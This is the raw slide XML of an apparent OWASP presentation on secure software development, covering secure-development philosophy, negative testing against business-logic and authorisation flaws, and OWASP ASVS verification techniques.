        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
        <a:buChar char="&lt;"/>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ebdings" pitchFamily="18" charset="2"/>
        <a:buChar char="4"/>
        <a:defRPr sz="24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12F0BA1-F3EC-422A-9162-017A3242CD40}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/30/2009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1071990-B537-4A18-952C-C02A71883F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4.bp.blogspot.com/_keJwBEZPgZE/SdgcWlR7KjI/AAAAAAAAB9A/rwJSK9RE974/s1600-h/OWASP+Code+Review+by+OWASP+Foundation+(Book)+in+Computers+&amp;+Internet.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3.pn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hyperlink" Target="http://4.bp.blogspot.com/_keJwBEZPgZE/SdgcWlR7KjI/AAAAAAAAB9A/rwJSK9RE974/s1600-h/OWASP+Code+Review+by+OWASP+Foundation+(Book)+in+Computers+&amp;+Internet.png" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.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 Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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oleObject" Target="../embeddings/Microsoft_Office_Excel_97-2003_Worksheet1.xls"/></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wmf"/><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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="762000"/>
            <a:ext cx="5867400" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure development (for a secure planet)</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="777777"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7171" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="2913063"/>
            <a:ext cx="3733800" cy="1419225"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="0"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Eoin</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keary</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP Board member</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Senior Manager, Ernst &amp; Young</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eoin.keary@ie.ey.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="1219200"/>
            <a:ext cx="5867400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="777777"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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fld id="{65DAFB79-4EF5-4E00-8FFE-CC0C6E7A10BB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>Philosophy of Secure Development</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1100138"/>
            <a:ext cx="4322763" cy="4678362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr sz="2000" dirty="0" smtClean="0"/>
              <a:t>Write code properly!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-IE" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Adhere to business requirements and no more!!</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>"Is it a business requirement that I can access other users data?”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr sz="2000" dirty="0" smtClean="0"/>
              <a:t>Negative use case/testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr sz="1600" dirty="0" smtClean="0"/>
              <a:t>Lets forget XSS, SQLI CSRF for a minute. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr sz="1600" dirty="0" smtClean="0"/>
              <a:t>There are easier ways to commit fraud than this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Breaking business Logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Breaking authorisation logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Breaking arithmetic logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>They require less technical skill but can be very powerful and automated tools do not detect such issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11269" name="Picture 6" descr="j0340520"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="409575" y="5791200"/>
            <a:ext cx="911225" cy="738188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11272" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5233988" y="1593850"/>
            <a:ext cx="2743200" cy="2462213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Design Goals:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security at source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Self-defending/aware applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" u="sng" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fulfill business requirements and nothing more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11273" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5129213" y="1487488"/>
            <a:ext cx="2728912" cy="465137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>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fld id="{4B926EB4-69FA-4878-8E4A-9440D8DE5FDD}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="152400"/>
            <a:ext cx="6934200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Philosophy of Secure Development</a:t>
            </a:r>
            <a:endParaRPr dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1493838"/>
            <a:ext cx="8331200" cy="1490662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr sz="2000" dirty="0" smtClean="0"/>
              <a:t>Security Touch-Points</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr sz="2000" dirty="0" smtClean="0"/>
              <a:t>Catch issues before they go live</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr sz="2000" dirty="0" smtClean="0"/>
              <a:t>Overall Improvement in quality: Stability, Reliability, Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12293" name="Picture 9" descr="j0340526"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="5707063"/>
            <a:ext cx="887413" cy="909637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12294" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="5670550"/>
            <a:ext cx="6400800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 54" descr="sdlc_owasp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1663700" y="2684496"/>
            <a:ext cx="5043488" cy="2954304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="5727700"/>
            <a:ext cx="3904082" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Probably the cheapest solution in the long term:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lower TCO &amp; risk of compromise, overall better quality</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1200" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2E69BD6A-6A85-4408-BD4D-01C80D76E25B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="152400"/>
            <a:ext cx="8039100" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>Application Security Verification Techniques (360</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>°)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0" smtClean="0"/>
              <a:t> Check out the OWASP ASVS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="180975" y="1524000"/>
            <a:ext cx="3581400" cy="830263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Find Vulnerabilities </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Using the Running Application (Outside-In)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4448175" y="2133600"/>
            <a:ext cx="0" cy="4343400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="23000" dir="5400000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="34999"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5667375" y="1524000"/>
            <a:ext cx="3124200" cy="830263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
